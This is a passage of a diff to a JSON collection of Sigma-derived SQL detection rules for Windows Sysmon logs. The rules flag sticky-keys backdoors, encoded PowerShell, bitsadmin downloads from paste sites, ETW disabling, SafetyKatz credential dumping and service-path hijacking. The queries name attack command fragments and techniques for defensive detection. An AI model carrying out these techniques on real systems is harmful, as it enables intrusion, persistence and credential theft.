'%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psping.exe' ESCAPE '\\' OR Image LIKE '%\\\\psping64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psService.exe' ESCAPE '\\' OR Image LIKE '%\\\\psService64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psshutdown.exe' ESCAPE '\\' OR Image LIKE '%\\\\psshutdown64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR Image LIKE '%\\\\pssuspend64.exe' ESCAPE '\\' OR Image LIKE '%\\\\RAMMap.exe' ESCAPE '\\' OR Image LIKE '%\\\\RDCMan.exe' ESCAPE '\\' OR Image LIKE '%\\\\RegDelNull.exe' ESCAPE '\\' OR Image LIKE '%\\\\RegDelNull64.exe' ESCAPE '\\' OR Image LIKE '%\\\\regjump.exe' ESCAPE '\\' OR Image LIKE '%\\\\ru.exe' ESCAPE '\\' OR Image LIKE '%\\\\ru64.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ShareEnum.exe' ESCAPE '\\' OR Image LIKE '%\\\\ShareEnum64.exe' ESCAPE '\\' OR Image LIKE '%\\\\shellRunas.exe' ESCAPE '\\' OR Image LIKE '%\\\\sigcheck.exe' ESCAPE '\\' OR Image LIKE '%\\\\sigcheck64.exe' ESCAPE '\\' OR Image LIKE '%\\\\streams.exe' ESCAPE '\\' OR Image LIKE '%\\\\streams64.exe' ESCAPE '\\' OR Image LIKE '%\\\\strings.exe' ESCAPE '\\' OR Image LIKE '%\\\\strings64.exe' ESCAPE '\\' OR Image LIKE '%\\\\sync.exe' ESCAPE '\\' OR Image LIKE '%\\\\sync64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\tcpvcon.exe' ESCAPE '\\' OR Image LIKE '%\\\\tcpvcon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\tcpview.exe' ESCAPE '\\' OR Image LIKE '%\\\\tcpview64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Testlimit.exe' ESCAPE '\\' OR Image LIKE '%\\\\Testlimit64.exe' ESCAPE '\\' OR Image LIKE '%\\\\vmmap.exe' ESCAPE '\\' OR Image LIKE '%\\\\vmmap64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Volumeid.exe' ESCAPE '\\' OR Image LIKE '%\\\\Volumeid64.exe' ESCAPE '\\' OR Image LIKE '%\\\\whois.exe' ESCAPE '\\' OR Image LIKE '%\\\\whois64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Winobj.exe' ESCAPE '\\' OR Image LIKE '%\\\\Winobj64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ZoomIt.exe' ESCAPE '\\' OR Image LIKE '%\\\\ZoomIt64.exe' ESCAPE '\\') AND NOT ((Company IN ('Sysinternals - www.sysinternals.com', 'Sysinternals')) OR (Company = '')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\pubprn.vbs%' ESCAPE '\\' AND CommandLine LIKE '%script:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_tools_masquerading.yml" + "filename": "proc_creation_win_lolbin_pubprn.yml" }, { - "title": "Persistence Via Sticky Key Backdoor", - "id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", + "title": "Potential Process Injection Via Msra.EXE", + "id": "744a188b-0415-4792-896f-11ddb0588dbc", "status": "experimental", - "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", - "author": "Sreeman", + "description": "Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics", + "author": "Alexander McDonald", "tags": [ - "attack.t1546.008", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ - "Unlikely" + "Legitimate use of Msra.exe" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%/y %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\cmd.exe C:\\\\windows\\\\system32\\\\sethc.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\msra.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%msra.exe' ESCAPE '\\' AND (Image LIKE '%\\\\arp.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\route.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_sticky_keys_replace.yml" + "filename": "proc_creation_win_msra_process_injection.yml" }, { - "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand", - "id": "a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", - "status": "test", - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "title": "Suspicious Extexport Execution", + "id": "fb0b815b-f5f6-4f50-970f-ffe21f253f7a", + "status": "experimental", + "description": "Extexport.exe loads dll and is execute from other folder the original path", "author": "frack113", "tags": [ "attack.defense_evasion", @@ -13609,3213 +13446,3285 @@ ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (CommandLine LIKE '%-ModuleName %' ESCAPE '\\' OR CommandLine LIKE '%-ModulePath %' ESCAPE '\\' OR CommandLine LIKE '%-ScriptBlock %' ESCAPE '\\' OR CommandLine LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%Extexport.exe%' ESCAPE '\\' OR Image LIKE '%\\\\Extexport.exe' ESCAPE '\\' OR OriginalFileName = 'extexport.exe'))" ], - "filename": "proc_creation_win_powershell_ath_remote_fxv_gpu_disablement_command.yml" + "filename": "proc_creation_win_lolbin_extexport.yml" }, { - "title": "Disable of ETW Trace", - "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", - "status": "test", - "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", - "author": "@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "title": "Rundll32 InstallScreenSaver Execution", + "id": "15bd98ea-55f4-4d37-b09a-e7caa0fa2221", + "status": "experimental", + "description": "An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" + "attack.t1218.011", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate installation of a new screensaver" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cl%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%clear-log%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%sl%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%set-log%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%logman%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\' AND CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%--p%' ESCAPE '\\' AND CommandLine LIKE '%-ets%' ESCAPE '\\') OR CommandLine LIKE '%Remove-EtwTraceProvider%' ESCAPE '\\' OR (CommandLine LIKE '%Set-EtwTraceProvider%' ESCAPE '\\' AND CommandLine LIKE '%0x11%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%InstallScreenSaver%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_etw_trace_evasion.yml" + "filename": "proc_creation_win_lolbin_rundll32_installscreensaver.yml" }, { - "title": "TAIDOOR RAT DLL Load", - "id": "d1aa3382-abab-446f-96ea-4de52908210b", + "title": "Remote Access Tool - LogMeIn Execution", + "id": "d85873ef-a0f8-4c48-a53a-6b621f11729d", "status": "test", - "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "falsepositives": [ + "Legitimate use" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'LMIGuardianSvc' OR Product = 'LMIGuardianSvc' OR Company = 'LogMeIn, Inc.'))" + ], + "filename": "proc_creation_win_remote_access_tools_logmein.yml" + }, + { + "title": "Suspicious Download From File-Sharing Website Via Bitsadmin", + "id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1055.001" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Some legitimate apps use this, but limited." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%dll,MyStart%' ESCAPE '\\' OR CommandLine LIKE '%dll MyStart%' ESCAPE '\\') OR (CommandLine LIKE '% MyStart' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_taidoor.yml" + "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml" }, { - "title": "Potential BearLPE Exploitation", - "id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", + "title": "Suspicious Encoded PowerShell Command Line", + "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", "status": "test", - "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par", - "author": "Olaf Hartong", + "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.t1053.005", - "car.2013-08-001" - ], - "falsepositives": [ - "Unknown" + "attack.execution", + "attack.t1059.001" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/RP%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAA%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% UwB%' ESCAPE '\\' OR CommandLine LIKE '% cwB%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -ENCOD %' ESCAPE '\\' OR CommandLine LIKE '% BA^J e-%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '% -ExecutionPolicy remotesigned %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_other_bearlpe.yml" + "filename": "proc_creation_win_powershell_base64_encoded_cmd.yml" }, { - "title": "RunDLL32 Spawning Explorer", - "id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", + "title": "Exchange PowerShell Snap-Ins Usage", + "id": "25676e10-2121-446e-80a4-71ff8506af47", "status": "experimental", - "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", - "author": "elhoim, CD_ROM_", + "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27", + "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1059.001", + "attack.collection", + "attack.t1114" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (ParentCommandLine LIKE '%\\\\shell32.dll,Control\\_RunDLL%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft.Exchange.Powershell.Snapin%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft.Exchange.Management.PowerShell.SnapIn%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND CommandLine LIKE '%$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_spawn_explorer.yml" + "filename": "proc_creation_win_powershell_snapins_hafnium.yml" }, { - "title": "Potential CVE-2022-29072 Exploitation Attempt", - "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", - "status": "experimental", - "description": "Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n", - "author": "frack113", + "title": "HackTool - Koadic Execution", + "id": "5cddf373-ef00-4112-ad72-960ac29bac34", + "status": "test", + "description": "Detects command line parameters used by Koadic hack tool", + "author": "wagga, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "cve.2022.29072" + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ParentImage LIKE '%\\\\7zFM.exe' ESCAPE '\\') AND NOT (((CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\')) OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%/q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%chcp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml" + "filename": "proc_creation_win_hktl_koadic.yml" }, { - "title": "HackTool - SafetyKatz Execution", - "id": "b1876533-4ed5-4a83-90f3-b8645840a413", + "title": "Powershell Inline Execution From A File", + "id": "ee218c12-627a-4d27-9e30-d6fb2fe22ed2", "status": "experimental", - "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], + "description": "Detects inline execution of PowerShell code from a file", + "author": "frack113", "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SafetyKatz.exe' ESCAPE '\\' OR OriginalFileName = 'SafetyKatz.exe' OR Description = 'SafetyKatz'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%iex %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command %' ESCAPE '\\' OR CommandLine LIKE '%icm %' ESCAPE '\\') AND (CommandLine LIKE '%cat %' ESCAPE '\\' OR CommandLine LIKE '%get-content %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\') AND CommandLine LIKE '% -raw%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_safetykatz.yml" + "filename": "proc_creation_win_powershell_exec_data_file.yml" }, { - "title": "Windows Defender Download Activity", - "id": "46123129-1024-423e-9fae-43af4a0fa9a5", + "title": "NtdllPipe Like Activity Execution", + "id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", "status": "test", - "description": "Detect the use of Windows Defender to download payloads", - "author": "Matthew Matchen", + "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%MpCmdRun.exe%' ESCAPE '\\' OR Description = 'Microsoft Malware Protection Command Line Utility') AND (CommandLine LIKE '%DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%url%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%type \\%windir\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type \\%systemroot\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type c:\\\\windows\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml" + "filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml" }, { - "title": "WMI Persistence - Script Event Consumer", - "id": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", + "title": "Suspicious Service Path Modification", + "id": "138d3531-8793-4f50-a2cd-f291b2863d78", "status": "test", - "description": "Detects WMI script event consumers", - "author": "Thomas Patzke", + "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", + "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.persistence", "attack.privilege_escalation", - "attack.t1546.003" + "attack.t1543.003" ], - "falsepositives": [ - "Legitimate event consumers", - "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" + "falsepositives": [ + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\' AND ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmi_persistence_script_event_consumer.yml" + "filename": "proc_creation_win_sc_service_path_modification.yml" }, { - "title": "Use of Mftrace.exe", - "id": "3d48c9d3-1aa6-418d-98d3-8fd3c01a564e", - "status": "experimental", - "description": "The \"Trace log generation tool for Media Foundation Tools\" (Mftrace.exe) can be used to execute arbitrary binaries", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries", + "id": "0ba1da6d-b6ce-4366-828c-18826c9de23e", + "status": "test", + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "author": "Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1036.003", + "car.2013-05-009" ], "falsepositives": [ - "Legitimate use for tracing purposes" + "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", + "PsExec installed via Windows Store doesn't contain original filename field (False negative)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR OriginalFileName = 'mftrace.exe') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' AND CommandLine LIKE '%.exe' ESCAPE '\\')) OR ParentImage LIKE '%\\\\mftrace.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Execute processes remotely' OR Product = 'Sysinternals PsExec' OR (Description LIKE 'Windows PowerShell%' ESCAPE '\\' OR Description LIKE 'pwsh%' ESCAPE '\\') OR (OriginalFileName LIKE 'powershell.exe' ESCAPE '\\' OR OriginalFileName LIKE 'pwsh.dll' ESCAPE '\\' OR OriginalFileName LIKE 'powershell\\_ise.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.c' ESCAPE '\\' OR OriginalFileName LIKE 'psexesvc.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'mshta.exe' ESCAPE '\\' OR OriginalFileName LIKE 'regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wmic.exe' ESCAPE '\\' OR OriginalFileName LIKE 'certutil.exe' ESCAPE '\\' OR OriginalFileName LIKE 'rundll32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cmstp.exe' ESCAPE '\\' OR OriginalFileName LIKE 'msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'reg.exe' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_mftrace.yml" + "filename": "proc_creation_win_renamed_binary_highly_relevant.yml" }, { - "title": "Exploiting CVE-2019-1388", - "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", - "status": "stable", - "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "title": "Use of W32tm as Timer", + "id": 